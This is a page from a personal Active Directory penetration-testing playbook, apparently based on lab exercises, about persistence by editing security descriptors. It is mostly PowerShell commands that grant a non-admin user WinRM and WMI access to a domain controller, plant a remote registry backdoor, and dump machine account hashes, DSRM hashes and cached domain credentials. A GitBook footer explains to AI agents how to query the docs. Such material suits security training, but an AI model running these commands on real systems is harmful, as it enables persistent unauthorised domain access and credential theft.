> For the complete documentation index, see [llms.txt](https://playbook.sidthoviti.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://playbook.sidthoviti.com/active-directory-pentest/persistence/using-acls/security-descriptors.md). # Security Descriptors ### Security Descriptors * It is possible to modify SD like Owner, primary group, DACL, SACL of multiple remote access methods (securable objects) to allow access to non-admin users. * Admin privileges are required to modify SD. * ACLs can be modified to allow non-admin users access securable objects. **PowerShell Remoting:** Use RACE toolkit, either PSRemoting or WMI * Using PSRemoting {% code overflow="wrap" %} ```powershell # Using PSRemoting # Run InviShell # First of all run (to import RACE Toolikit) -: . C:\AD\Tools\RACE-master\RACE.ps1 # On local machine for student1, open elevated cmd: # This reads the existing ACL for root namespace and DCOM and add an entry for our SID. Set-RemotePSRemoting -SamAccountName student1 -Verbose # On remote machine for student1 without credentials: Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose # Connect to dcorp-dc as student Enter-PSSession -ComputerName dcorp-dc # To remove the permissions on remote machine: Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove ``` {% endcode %} * Using WMI {% code overflow="wrap" %} ```powershell # OR Using WMI Set-RemoteWMI -SamAccountName student1 -Verbose # On remote machine for student1 without credentials: Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose # On remote machine with explicit credentials. Only root\cimv2 and nested namespaces: Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose # On remote machine remove permissions: Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc-namespace 'root\cimv2' -Remove -Verbose # Now we can run WMI queries on DC as student. powershell gwmi -class win32_operatingsystem -ComputerName dcorp-dc ``` {% endcode %} **Remote Registry:** * Using `RACE` or DAMP, with admin privs on remote machine (Make sure to run this first) -: ```powershell Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose ``` * As student1, retrieve machine account hash: ```powershell Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose ``` * Retrieve local account hash: (DSRM Administrator) ```powershell Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose ``` * Retrieve domain cached credentials: ```powershell Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/persistence/using-acls/security-descriptors.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.